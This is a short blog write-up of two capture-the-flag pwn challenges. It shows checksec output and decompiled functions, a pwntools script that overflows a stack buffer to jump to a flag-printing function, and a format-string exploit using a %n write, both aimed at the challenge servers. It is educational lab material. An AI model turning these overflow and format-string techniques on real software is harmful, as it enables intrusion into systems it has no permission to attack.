blog http://blog.yutian233.xyz/
C is hard
➜ ctf21 checksec source_fixed
[*] '/home/yutian/ctf21/source_fixed'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
IDA
main
int __cdecl main(int argc, const char **argv, const char **envp)
{
__int64 v3; // rdx
__int64 v5; // [rsp-8h] [rbp-8h]
__asm { endbr64 }
puts_0("I will give you my secret if you can run my function", argv, envp);
vuln((__int64)&v5);
puts_0("This is not my function :", argv, v3);
return 0;
}
vuln
.text:000000000040121A public vuln
.text:000000000040121A vuln proc near ; CODE XREF: main+19↓p
.text:000000000040121A ; __unwind {
.text:000000000040121A endbr64
.text:000000000040121E push rbp
.text:000000000040121F mov rbp, rsp
.text:0000000000401222 sub rsp, 20h
.text:0000000000401226 lea rax, [rbp-20h]
.text:000000000040122A mov rdi, rax
.text:000000000040122D mov eax, 0
.text:0000000000401232 call sub_4010B0
.text:0000000000401237 nop
.text:0000000000401238 leave
.text:0000000000401239 retn
.text:0000000000401239 ; } // starts at 40121A
.text:0000000000401239 vuln endp
print_flag
__int64 __usercall print_flag@<rax>(__int64 a1@<rbp>)
{
__int64 v1; // ST08_8
__int64 v3; // [rsp-8h] [rbp-8h]
__asm { endbr64 }
v3 = a1;
v1 = sub_4010C0("flag.txt", &unk_402008);
sub_4010A0(&flag, 64LL, v1);
return sub_401090(" Thanks for running my function, here is my secret : %s%s%s", "\x1B[38;5;83m", &flag, "\x1B[0m");
}
exp
from pwn import *
#io = process("./source_fixed")
io = remote("chall.codefest.tech", 8782)
flag_addr = 0x04011B6
payload = cyclic(0x28) + p64(flag_addr)
io.recvuntil("I will give you my secret if you can run my function")
io.sendline(payload)
io.interactive()
Take me to a cafe
exp
from pwn import *
# io = process("./format")
io = remote("chall.codefest.tech", 8745)
# context.log_level='debug'
c_addr = 0x0804C044
payload = p32(c_addr) + b'%51962d' + b'%4$n'
io.sendline(payload)
io.interactive()